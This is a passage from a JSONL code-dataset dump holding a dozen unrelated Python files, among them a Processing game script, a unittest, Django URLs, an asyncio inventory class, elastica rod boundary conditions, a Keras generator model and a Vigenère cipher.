and 400 < mouseX < 875 and 500 < mouseY < 600 and points == 0:\n finalChars.append(currChar)\n if charInList < len(charList) - 1:\n charInList += 1\n setBases(charInList)\n points = 2\n else:\n print(finalChars)\n state += 1\n if state == 50: #letter screen\n if mousePressed and 1150 < mouseX < 1350 and 560 < mouseY < 660:\n fill(255)\n state = 1\n background(139,0,0)\n setup2()\n\ndef draw():\n global state\n if state == 0:\n return 0\n if state == 1:\n global players\n charHover()\n elif state == 2:\n global charInList\n drawCharacter(charInList)\n drawButtons(charInList)\n elif state == 3:\n background(139,0,0)\n elif state == 50:\n return 0\n \n \n \n \n","sub_path":"WorldsEnd/WorldsEnd.pyde","file_name":"WorldsEnd.pyde","file_ext":"pyde","file_size_in_byte":17614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"184225919","text":"import unittest\nimport subprocess\nfrom odybcl2fastq import config\nimport shutil\nimport os\n\n\ndef run_cmd(cmd):\n # run unix cmd, return out and error\n proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n out, err = proc.communicate()\n return (proc.returncode, out, err)\n\n\ndef resetDirs(dirs):\n for d in dirs:\n try:\n shutil.rmtree(config[d])\n os.makedirs(config[d])\n except Exception:\n pass\n\n\nclass LoadRunsTest(unittest.TestCase):\n\n def setUp(self):\n resetDirs(['SOURCE_DIR', 'OUTPUT_DIR', 'FINAL_DIR'])\n\n def tearDown(self):\n resetDirs(['SOURCE_DIR', 'OUTPUT_DIR', 'FINAL_DIR'])\n\n def testLogging(self):\n '''\n load_runs_tests: Make sure that log file specification works, either absolute path or relative path\n '''\n logfile = '/tmp/log'\n cmd = 'LOAD_RUNS_LOG_FILE=%s load_runs --no-daemon' % logfile\n code, out, err = run_cmd(cmd)\n self.assertTrue(code == 0, 'Error running command %s, %s' % (cmd, err))\n logsdata = open(logfile, 'r').read()\n self.assertTrue('Found 0 need_to_process runs' in logsdata, 'Incorrect output: %s' % logsdata)\n self.assertTrue('Found 0 run_is_incomplete runs' in logsdata, 'Incorrect output: %s' % logsdata)\n","sub_path":"test/load_runs_tests.py","file_name":"load_runs_tests.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262482916","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'zmBlog'\nurlpatterns = [\n # ex: /zmBlog/\n url(r'^$', views.IndexView.as_view(), name='index'),\n # ex: /zmBlog/create/\n url(r'^create/$', views.CreateView.as_view(), name='create'), \n # ex: /zmBlog/5/\n url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n # ex: /zmBlog/5/like/\n url(r'^(?P[0-9]+)/like/$', views.like, name='like'),\n # ex: /zmBlog/5/change/\n # url(r'^(?P[0-9]+)/change/$', views.change, name='change'), \n]","sub_path":"zmBlog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"502613508","text":"import asyncio\nimport random\n\n\nclass Inventory:\n def __init__(self):\n self.catalogue = {\n \"Burgers\": [\n {\"id\": 1, \"name\": \"Python Burger\", \"price\": 5.99},\n {\"id\": 2, \"name\": \"C Burger\", \"price\": 4.99},\n {\"id\": 3, \"name\": \"Ruby Burger\", \"price\": 6.49},\n {\"id\": 4, \"name\": \"Go Burger\", \"price\": 5.99},\n {\"id\": 5, \"name\": \"C++ Burger\", \"price\": 7.99},\n {\"id\": 6, \"name\": \"Java Burger\", \"price\": 7.99}\n ],\n \"Sides\": {\n \"Fries\": [\n {\"id\": 7, \"size\": \"Small\", \"price\": 2.49}, \n {\"id\": 8, \"size\": \"Medium\", \"price\": 3.49}, \n {\"id\": 9, \"size\": \"Large\", \"price\": 4.29}\n ],\n \"Caesar Salad\": [\n {\"id\": 10, \"size\": \"Small\", \"price\": 3.49}, \n {\"id\": 11, \"size\": \"Large\", \"price\": 4.49}\n ]\n },\n \"Drinks\": {\n \"Coke\": [\n {\"id\": 12, \"size\": \"Small\", \"price\": 1.99}, \n {\"id\": 13, \"size\": \"Medium\", \"price\": 2.49}, \n {\"id\": 14, \"size\": \"Large\", \"price\": 2.99}\n ],\n \"Ginger Ale\": [\n {\"id\": 15, \"size\": \"Small\", \"price\": 1.99}, \n {\"id\": 16, \"size\": \"Medium\", \"price\": 2.49}, \n {\"id\": 17, \"size\": \"Large\", \"price\": 2.99}\n ],\n \"Chocolate Milk Shake\": [\n {\"id\": 18, \"size\": \"Small\", \"price\": 3.99}, \n {\"id\": 19, \"size\": \"Medium\", \"price\": 4.49}, \n {\"id\": 20, \"size\": \"Large\", \"price\": 4.99}\n ]\n }\n }\n self._generate_item_lookup_dict()\n self.stock = {i + 1: random.randint(0,15) for i in range(len(self.items))}\n self.stock_lock = asyncio.Lock()\n\n def _generate_item_lookup_dict(self):\n self.items = {}\n for category in self.catalogue:\n category_collection = self.catalogue[category]\n\n if isinstance(category_collection, list):\n for item in category_collection:\n new_item = item.copy()\n new_item[\"category\"] = category\n new_item[\"subcategory\"] = None\n self.items[new_item[\"id\"]] = new_item\n else:\n for subcategory in category_collection:\n for item in category_collection[subcategory]:\n new_item = item.copy()\n new_item[\"category\"] = category\n new_item[\"subcategory\"] = subcategory\n self.items[new_item[\"id\"]] = new_item\n\n def _verify_item_id(func):\n async def wrapper(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n \n result = await func(self, item_id)\n return result\n \n return wrapper\n\n async def get_number_of_items(self):\n await asyncio.sleep(1)\n return len(self.items)\n \n async def get_catalogue(self):\n await asyncio.sleep(2)\n return self.catalogue\n\n @_verify_item_id\n async def get_stock(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n await asyncio.sleep(2)\n\n async with self.stock_lock:\n return self.stock[item_id]\n\n @_verify_item_id\n async def decrement_stock(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n\n if self.stock[item_id] == 0:\n return False\n \n async with self.stock_lock:\n self.stock[item_id] -= 1\n return True\n\n @_verify_item_id\n async def get_item(self, item_id):\n await asyncio.sleep(1)\n return self.items[item_id]","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322286362","text":"__doc__ = \"\"\" Numpy implementation module for boundary condition implementations that constrain or\ndefine displacement conditions on the rod\"\"\"\n__all__ = [\"FreeRod\", \"OneEndFixedRod\", \"HelicalBucklingBC\"]\nimport numpy as np\nfrom elastica._rotations import _get_rotation_matrix\n\n\nclass FreeRod:\n \"\"\"\n This is the base class for displacement boundary conditions. It applies no constraints or displacements to the rod.\n\n Note\n ----\n Every new displacement boundary condition class must be\n derived from FreeRod class.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Free rod has no input parameters.\n \"\"\"\n pass\n\n def constrain_values(self, rod, time):\n \"\"\"\n Constrain values (position and/or directors) of a rod object.\n\n In FreeRod class, this routine simply passes.\n\n Parameters\n ----------\n rod : object\n Rod-like object.\n time : float\n The time of simulation.\n\n Returns\n -------\n\n \"\"\"\n pass\n\n def constrain_rates(self, rod, time):\n \"\"\"\n Constrain rates (velocity and/or omega) of a rod object.\n\n In FreeRod class, this routine simply passes.\n\n Parameters\n ----------\n rod : object\n Rod-like object.\n time : float\n The time of simulation.\n\n Returns\n -------\n\n \"\"\"\n pass\n\n\nclass OneEndFixedRod(FreeRod):\n \"\"\"\n This boundary condition class fixes one end of the rod. Currently,\n this boundary condition fixes position and directors\n at the first node and first element of the rod.\n\n Attributes\n ----------\n fixed_positions : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n fixed_directors : numpy.ndarray\n 3D (dim, dim, 1) array containing data with 'float' type.\n \"\"\"\n\n def __init__(self, fixed_position, fixed_directors):\n \"\"\"\n\n Parameters\n ----------\n fixed_position : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n fixed_directors : numpy.ndarray\n 3D (dim, dim, 1) array containing data with 'float' type.\n \"\"\"\n FreeRod.__init__(self)\n self.fixed_position = fixed_position\n self.fixed_directors = fixed_directors\n\n def constrain_values(self, rod, time):\n rod.position_collection[..., 0] = self.fixed_position\n rod.director_collection[..., 0] = self.fixed_directors\n\n def constrain_rates(self, rod, time):\n rod.velocity_collection[..., 0] = 0.0\n rod.omega_collection[..., 0] = 0.0\n\n\nclass HelicalBucklingBC(FreeRod):\n \"\"\"\n This is the boundary condition class for Helical\n Buckling case in Gazzola et. al. RSoS (2018).\n The applied boundary condition is twist and slack on to\n the first and last nodes and elements of the rod.\n\n Attributes\n ----------\n twisting_time: float\n Time to complete twist.\n final_start_position: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Position of first node of rod after twist completed.\n final_end_position: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Position of last node of rod after twist completed.\n ang_vel: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Angular velocity of rod during twisting time.\n shrink_vel: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Shrink velocity of rod during twisting time.\n final_start_directors: numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Directors of first element of rod after twist completed.\n final_end_directors: numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Directors of last element of rod after twist completed.\n\n\n \"\"\"\n\n def __init__(\n self,\n position_start,\n position_end,\n director_start,\n director_end,\n twisting_time,\n slack,\n number_of_rotations,\n ):\n \"\"\"\n\n Parameters\n ----------\n\n position_start : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Initial position of first node.\n position_end : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Initial position of last node.\n director_start : numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Initial director of first element.\n director_end : numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Initial director of last element.\n twisting_time : float\n Time to complete twist.\n slack : float\n Slack applied to rod.\n number_of_rotations : float\n Number of rotations applied to rod.\n \"\"\"\n FreeRod.__init__(self)\n self.twisting_time = twisting_time\n\n angel_vel_scalar = (\n 2.0 * number_of_rotations * np.pi / self.twisting_time\n ) / 2.0\n shrink_vel_scalar = slack / (self.twisting_time * 2.0)\n\n direction = (position_end - position_start) / np.linalg.norm(\n position_end - position_start\n )\n\n self.final_start_position = position_start + slack / 2.0 * direction\n self.final_end_position = position_end - slack / 2.0 * direction\n\n self.ang_vel = angel_vel_scalar * direction\n self.shrink_vel = shrink_vel_scalar * direction\n\n theta = number_of_rotations * np.pi\n\n self.final_start_directors = (\n _get_rotation_matrix(theta, direction.reshape(3, 1)).reshape(3, 3)\n @ director_start\n ) # rotation_matrix wants vectors 3,1\n self.final_end_directors = (\n _get_rotation_matrix(-theta, direction.reshape(3, 1)).reshape(3, 3)\n @ director_end\n ) # rotation_matrix wants vectors 3,1\n\n def constrain_values(self, rod, time):\n if time > self.twisting_time:\n rod.position_collection[..., 0] = self.final_start_position\n rod.position_collection[..., -1] = self.final_end_position\n\n rod.director_collection[..., 0] = self.final_start_directors\n rod.director_collection[..., -1] = self.final_end_directors\n\n def constrain_rates(self, rod, time):\n if time > self.twisting_time:\n rod.velocity_collection[..., 0] = 0.0\n rod.omega_collection[..., 0] = 0.0\n\n rod.velocity_collection[..., -1] = 0.0\n rod.omega_collection[..., -1] = 0.0\n\n else:\n rod.velocity_collection[..., 0] = self.shrink_vel\n rod.omega_collection[..., 0] = self.ang_vel\n\n rod.velocity_collection[..., -1] = -self.shrink_vel\n rod.omega_collection[..., -1] = -self.ang_vel\n","sub_path":"elastica/_elastica_numpy/_boundary_conditions.py","file_name":"_boundary_conditions.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1841519","text":"#!/usr/bin/python\n# coding:utf-8\n\nPORT = 8081\n\ndef run_file_server():\n Handler = http.server.SimpleHTTPRequestHandler\n with socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run_file_server()\n exit(1)\n","sub_path":"py3/smart_car/smart_server/file_server.py.py","file_name":"file_server.py.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314520586","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\nfrom datasheet import AE_Input_train, AE_Input_test, AE_Label\nimport matplotlib.pyplot as plt\n\n# Load test variable and trained parameters\nencoder = torch.load('/Users/WoochanH/python/ecgproject/main/trainedparams/sae_encoder_MSE_5000_Tanh_pretrain.pt')\ndecoder = torch.load('/Users/WoochanH/python/ecgproject/main/trainedparams/sae_decoder_MSE_5000_Tanh_pretrain.pt')\nTensor_trainset = Variable(torch.from_numpy(AE_Input_train).float())\nTensor_testset = Variable(torch.from_numpy(AE_Input_test).float())\nTensor_label = Variable(torch.from_numpy(AE_Label).float())\n\nkey = input(\"Will you test on testset(1) or trainset(2)?: \")\nbatch = input(\"Which batch will you plot?: \")\n\nif key == 1:\n Input_tensor = Tensor_testset\n dirty = np.reshape(AE_Input_test, (2400,270))\n dirtyarray = dirty[batch]\nelif key == 2:\n Input_tensor = Tensor_trainset\n dirty = np.reshape(AE_Input_train, (43200, 270))\n dirtyarray = dirty[batch]\nelse:\n print(\"Invalid input\")\n\n# Run Model on Input data\nEn1 = encoder(Input_tensor)\nDe1 = decoder(En1)\nEn2 = encoder(De1)\nDe2 = decoder(En2)\n\n\n# Reshape into numpy array\ndenoised = De2.data[batch]\ndenoisedarray = denoised.numpy()\n\n\n# Plot to compare\nplt.figure(figsize = (10,4))\nplt.plot(denoisedarray, color='blue', linewidth=0.2, linestyle='-', label = 'Denoised');\nplt.plot(dirtyarray, color='k', linewidth=0.4, linestyle='-', label = 'Noisy');\nplt.legend(loc = 2);\nplt.title(\"Comparison between original and denoised\");\n\nplt.show()\n'''\n# Plot Loss over EPOCH\ntrain_loss = np.load('/Users/WoochanH/python/ecgproject/main/sae_train_loss.npz')\nplt.figure(figsize = (10,4))\nplt.plot(train_loss, color='k', linewidth=0.4, linestyle='-', label = 'MSE loss');\nplt.legend(loc = 2);\nplt.title(\"Loss over Epoch\");\n\nplt.show()\n'''\n","sub_path":"autoencoder/testaeecg.py","file_name":"testaeecg.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242454415","text":"#A more difficult variation of the lovely caesar where Key is now a word\n#Note: Key does not consider spaces or special characters, keeps changing regardless\n#Last Edited: 11/24/17\n#Status: Complete\n\n#Import sys for command-line arguments and interpretation in one line\nimport sys\n\ndef main():\n #Confirm key is present:\n try:\n arg1 = sys.argv[1]\n except IndexError:\n print (\"Usage: \")\n return 1\n #Confirm key is consistent of only letters:\n for x in arg1:\n if x.isalpha():\n continue\n else:\n print(\"Key must be composed of letters.\")\n return 1.5\n\n #Now that key works, ask for the phrase\n phrase = input(\"Enter the phrase you mean to cipher:\")\n #calling cipher function\n cipher(phrase, sys.argv[1])\n\ndef cipher(phrase, key):\n #Assuming key has already passed previous parameters,\n #convert the letter into a number and change the\n #phrase according to the current key.\n y = 0 #Counter to be able to change the key\n for x in phrase:\n #Formula that changes the key;it's off by one/does not work\n keyLoop = key[y % len(key)]\n if keyLoop.isupper():\n newKey = (ord(keyLoop) + 1) - ord('A')\n y += 1\n elif keyLoop.islower():\n newKey = (ord(keyLoop) + 1) - ord('a')\n y += 1\n############################################################################\n #Encoding the phrase with the new key\n if x.isalpha():\n if x.isupper():\n newPhrase = ((ord(x) - ord('A') + newKey) % 26) + ord('A')\n elif x.islower():\n newPhrase = ((ord(x) - ord('a') + newKey) % 26) + ord('a')\n\n newPhrase = str(chr(newPhrase)) #Converting back to ASCII Character\n sys.stdout.write(newPhrase)\n\n else:\n sys.stdout.write(x) #printing if it's not a character\n sys.stdout.write('\\n') #printing new line\n\n\n#Read code and confirm command line argument\nif __name__ == \"__main__\":\n main()","sub_path":"python/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"144694241","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 4 05:41:06 2019\r\n\r\n@author: ymamo\r\n\"\"\"\r\n\r\nfrom random import randint\r\nfrom scipy.stats.mstats import gmean\r\nfrom itertools import combinations\r\nimport functools\r\n#from ML_Mesa import MetaAgent\r\n\r\nclass rules(): \r\n \r\n def __init__(self): \r\n self.metabolism = None\r\n #Data set up = {1 : Sugar Value, 2 : Spice Value}\r\n self.accumulations = None\r\n \r\n \r\n def calc_accumulations(self,meta):\r\n \r\n sug_amount = 0\r\n spice_amount = 0\r\n for agent in meta.sub_agents.values(): \r\n if agent.type == 'agent':\r\n sug_amount += agent.accumulations[1.0]\r\n spice_amount += agent.accumulations[2.0]\r\n elif agent.type == 'meta':\r\n sug_amount += agent.policy.accumulations[1.0]\r\n spice_amount += agent.policy.accumulations[2.0]\r\n \r\n \r\n return {1.0: sug_amount, 2.0:spice_amount}\r\n \r\n \r\n \r\n def find_trader(self, agent, meta):\r\n '''\r\n Helper Function for self.trade(): \r\n \r\n gets_agents from nearby to trade with\r\n '''\r\n \r\n \r\n traders = []\r\n neighbors = [i for i in agent.model.grid.get_neighborhood(agent.pos, \\\r\n agent.moore, radius = agent.capability['vision'])]\r\n \r\n for n in neighbors: \r\n this_cell = agent.model.grid.get_cell_list_contents([n])\r\n for item in this_cell: \r\n if str(item) == \"Agent\" and item not in meta.sub_agents.values():\r\n traders.append(item) #for intial step 2 agents \r\n #may be on same grid\r\n #based on random selection \r\n return traders\r\n \r\n \r\n def group_trade(self, agent, meta):\r\n \r\n '''\r\n Trade Function \r\n \r\n GrAS p. 105\r\n '''\r\n \r\n agent.assess_welfare()\r\n \r\n traders = self.find_trader(agent, meta)\r\n \r\n if len(traders) > 0: \r\n agent.model.random.shuffle(traders) #randomize who trade with\r\n else: \r\n return\r\n \r\n \r\n for partner in traders: \r\n #trade_benefit = True\r\n #while trade_benefit: \r\n # Per trade formulation, and to prevent divison by zero warning\r\n if agent.MRS == partner.MRS: \r\n pass\r\n \r\n else: \r\n #Calculate Price\r\n price = gmean([agent.MRS, partner.MRS])\r\n \r\n #Draft Trade\r\n if price > 1: \r\n spice = price\r\n sugar = 1\r\n else:\r\n sugar = 1/price\r\n spice = 1\r\n \r\n \r\n \r\n \r\n if agent.MRS > partner.MRS: \r\n conduct = agent.draft_trade(sugar, spice, partner)\r\n if conduct == True: \r\n agent.accumulations[1] += sugar\r\n agent.accumulations[2] -= spice\r\n partner.accumulations[2] += spice\r\n partner.accumulations[1] -= sugar\r\n agent.model.price_record[agent.model.step_num].append(price)\r\n agent.assess_welfare()\r\n partner.assess_welfare()\r\n agent.make_link(partner)\r\n self.accumulations = agent.accumulations\r\n else: \r\n pass\r\n \r\n \r\n else: \r\n conduct = partner.draft_trade(sugar, spice, agent)\r\n if conduct == True:\r\n agent.accumulations[1] -= sugar\r\n agent.accumulations[2] += spice\r\n partner.accumulations[2] -= spice\r\n partner.accumulations[1] += sugar\r\n agent.assess_welfare()\r\n partner.assess_welfare()\r\n agent.model.price_record[agent.model.step_num].append(price)\r\n agent.make_link(partner)\r\n self.accumulations = agent.accumulations\r\n else: \r\n pass\r\n \r\n def sub_step(self, agent, meta): \r\n \r\n \r\n self.accumulations = self.calc_accumulations(meta)\r\n #Save agents situation\r\n agent.accumulations = self.accumulations\r\n agent.move()\r\n agent.collect()\r\n self.accumulations = agent.accumulations\r\n \r\n \r\n def sub_step2(self,agent, meta): \r\n \r\n agent.die()\r\n if agent.status == \"dead\":\r\n return\r\n agent.accumulations = self.accumulations\r\n agent.eat()\r\n self.accumulations = agent.accumulations\r\n \r\n self.group_trade(agent, meta) \r\n \r\n \r\n \r\n def step(self, agent): \r\n '''\r\n Purpose: Replace agent step function with one which follows an \r\n organizational policy of all the agents\r\n \r\n Use recursion to get ensure you get down to granular agent\r\n '''\r\n\r\n meta = agent.model.ml.get_agent_group(agent, 'trades')\r\n \r\n \r\n self.sub_step(agent, meta)\r\n self.sub_step2(agent, meta)\r\n \r\n ","sub_path":"Common Resource- one level/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331383438","text":"\r\nfrom keras.utils import np_utils\r\nimport keras.models as models\r\nfrom keras.layers import Input,merge, Concatenate\r\nfrom keras.layers.core import Reshape,Dense,Dropout,Activation,Flatten\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.activations import *\r\nfrom keras.layers.wrappers import TimeDistributed\r\nfrom keras.layers.noise import GaussianNoise\r\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D, ZeroPadding1D, UpSampling1D,Convolution1D\r\nfrom keras.regularizers import *\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.optimizers import *\r\nfrom keras.datasets import mnist\r\nfrom keras.models import Model\r\nfrom keras.layers import Layer\r\nfrom keras import backend as K\r\nfrom keras.layers import LSTM\r\nimport math;\r\n\r\n\r\n\r\n#Custom loss funciton\r\nclass NormalPDFLogLikelyhoodLayer(Layer):\r\n \r\n def __init__(self, **kwargs):\r\n self.is_placeholder = True\r\n self.scalingFactor = 1./math.sqrt(2*math.pi);\r\n super(NormalPDFLogLikelyhoodLayer, self).__init__(**kwargs) \r\n\r\n def call(self, inputs):\r\n mu = inputs[0];\r\n sigmaSquared = inputs[1];\r\n observation = inputs[2];\r\n \r\n \r\n #self.scalingFactor *\r\n pdfValue = K.exp(-K.square(observation - mu) / (2 * sigmaSquared) ) / K.sqrt(sigmaSquared)\r\n \r\n \r\n logLikelyhood = K.log(1+pdfValue)\r\n # Having some issues with stability\r\n loss = K.exp(-K.mean(logLikelyhood));\r\n \r\n \r\n #logLikelyhood = K.mean(K.log(sigmaSquared)-K.square(observation - mu)/ (2*sigmaSquared));\r\n #loss = logLikelyhood;\r\n self.add_loss(loss, inputs=inputs)\r\n \r\n # Output is not relevant\r\n return inputs;\r\n\r\nclass GeneratorFactory:\r\n def __init__(self, dopt, shp=[25], dropout_rate = 0.25):\r\n self.inputShape = shp;\r\n self.dopt = dopt; \r\n self.dropout_rate = dropout_rate;\r\n \r\n def createLSTM(self, look_back = 10, batch_size = 128):\r\n g_input = Input(shape=self.inputShape, batch_shape = (batch_size,look_back, 1))\r\n H = g_input\r\n H = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True, return_sequences=True)(H);\r\n H = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True)(H);\r\n H = Dense(8)(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dense(4)(H)\r\n H = LeakyReLU(0.1)(H)\r\n LowLevelMean = Dense(1, activation = \"sigmoid\")(H);\r\n \r\n \r\n H2 = g_input\r\n H2 = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True, return_sequences=True)(H2);\r\n H2 = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True)(H2);\r\n H2 = Dense(8)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dense(4)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n LowLevelVar = Dense(1, activation = \"sigmoid\")(H2);\r\n \r\n H2 = Concatenate()([H2, LowLevelMean]);\r\n \r\n g_V2 = Dense(1,activation='sigmoid', name=\"PredictedVariance\")(H2)\r\n\r\n\r\n #\r\n\r\n H = Concatenate()([H, LowLevelVar])\r\n \r\n g_V1 = Dense(1,activation='sigmoid', name='PredictedMean')(H)\r\n\r\n\r\n generator = Model(g_input,[g_V1, g_V2] , name=\"Generator_model\")\r\n generator.compile(loss='mse', optimizer=self.dopt)\r\n generator.summary()\r\n return generator, g_input\r\n \r\n def create(self, nch = 100):\r\n \r\n g_input = Input(shape=self.inputShape)\r\n H = g_input\r\n H = Conv1D(128, kernel_size=5, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H) \r\n H = LeakyReLU(0.1)(H) \r\n H = Dropout(self.dropout_rate)(H)\r\n H = Conv1D(32, kernel_size=3, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dropout(self.dropout_rate)(H) \r\n H = Flatten()(H)\r\n\r\n H = Dense(16)(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dense(8)(H)\r\n H = LeakyReLU(0.1)(H) \r\n H = Dropout(self.dropout_rate)(H)\r\n LowLevelMean = Dense(1)(H);\r\n\r\n H2 = g_input\r\n H2 = Conv1D(128, kernel_size=5, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H2) \r\n H2 = LeakyReLU(0.1)(H2) \r\n H2 = Dropout(self.dropout_rate)(H2)\r\n H2 = Conv1D(32, kernel_size=3, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dropout(self.dropout_rate)(H2) \r\n H2 = Flatten()(H2)\r\n\r\n H2 = Dense(16)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dense(8)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n \r\n H2 = Dropout(self.dropout_rate)(H2)\r\n LowLevelVar = Dense(1)(H2);\r\n H2 = Concatenate()([H2, LowLevelMean]);\r\n \r\n g_V2 = Dense(1,activation='sigmoid', name=\"PredictedVariance\")(H2)\r\n\r\n\r\n #\r\n\r\n H = Concatenate()([H, LowLevelVar])\r\n \r\n g_V1 = Dense(1,activation='sigmoid', name='PredictedMean')(H)\r\n\r\n\r\n generator = Model(g_input,[g_V1, g_V2] , name=\"Generator_model\")\r\n generator.compile(loss='mse', optimizer=self.dopt)\r\n generator.summary()\r\n return generator, g_input\r\n \r\n \r\n def createLossModel(self, overallInput, generatorOutput, observed):\r\n \r\n \r\n H=NormalPDFLogLikelyhoodLayer()([generatorOutput[0],generatorOutput[1], observed]);\r\n lossModel = Model([overallInput,observed],H , name=\"Loss_model\")\r\n lossModel.compile(loss=None, optimizer=\"rmsprop\")\r\n \r\n return lossModel;\r\n ","sub_path":"src/SingleStepGenerator.py","file_name":"SingleStepGenerator.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"491529472","text":"from sklearn.preprocessing import MultiLabelBinarizer\nimport numpy as np\n\nfile_path = '电影类型对应标签文件'\nsave_path = '独热编码的电影类型标签文件'\n\nread_folder = open(file_path, \"r\") # 读取原始标签文件\nlabels = read_folder.read().splitlines() # 将标签文件按行分割\n# 将标签和类别ID对应\nlabel_type = {122714: 1, 122715: 2, 122716: 3, 122717: 4, 122718: 5,\n 122719: 6, 122720: 7, 122721: 8, 122722: 9, 122723: 10,\n 122724: 11, 122725: 12, 122726: 13, 122727: 14, 122728: 15,\n 122729: 16, 122730: 17, 122731: 18, 122732: 19, 122733: 20}\n\nmovies = [] # 保存电影ID\ntypes = [] # 保存类型ID\n# 循环分割每一行,分别保存电影ID和类型ID\nfor lines in labels:\n movies.append(lines.split(\"\\t\", 1)[0])\n types.append(lines.split(\"\\t\", 1)[1])\n\nflag = 1\nlabel_types = []\ntemp = []\nfor i in range(len(movies)):\n if int(movies[i]) == flag:\n temp.append(label_type[int(types[i])])\n elif i == len(movies) - 1:\n label_types.append(temp)\n temp = [label_type[int(types[i])]]\n label_types.append(temp)\n else:\n label_types.append(temp)\n temp = [label_type[int(types[i])]]\n flag = int(movies[i])\n\nprint(flag)\nt = MultiLabelBinarizer().fit_transform(label_types)\nnp.save(save_path, t)\nread_folder.close()\n# p = np.load(save_path)\n","sub_path":"Data_processing/multi_label.py","file_name":"multi_label.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493123804","text":"\nclass WordTypeTemplateExtractor(object):\n\n def __init__(self):\n self.templates = []\n\n def add_template(self, template, extract, new):\n template_length = len(template)\n self.templates.append((template, extract, new))\n self.templates.sort(key=lambda t: len(t[0]), reverse=True)\n\n def extract_all_templates(self, objects, context):\n old_objects = objects\n print(old_objects)\n\n # The new objects that replaced the old values\n result = []\n\n # The new array, with the objects replaced\n new_list = []\n\n # Checking on types, so preprocessing the objects\n objects = [type(o) for o in objects]\n\n # Current index in the object loop\n obj_index = 0\n\n while obj_index < len(objects):\n\n # Current object\n o = objects[obj_index]\n\n # Template found on current object\n templated = False\n\n for templ_index, template in enumerate(self.templates):\n\n extraction = {}\n mistake_found = False\n\n # Counter for skipping indices\n counter = 0\n\n for i in range(0, len(template[0])):\n\n if (obj_index + i) >= len(objects):\n mistake_found = True\n break\n if template[0][i] != objects[obj_index + i]:\n mistake_found = True\n break\n\n for extract_index, arg in enumerate(template[1]):\n if arg[0] == i:\n extraction[arg[1]] = old_objects[obj_index + i]\n\n counter += 1\n\n if not mistake_found:\n\n obj_index += counter\n counter = 0\n\n templated = True\n to_add = template[2](extraction, context)\n new_list.append(to_add)\n result.append(to_add)\n break\n\n if not templated:\n print(len(old_objects), obj_index)\n new_list.append(old_objects[obj_index])\n obj_index += 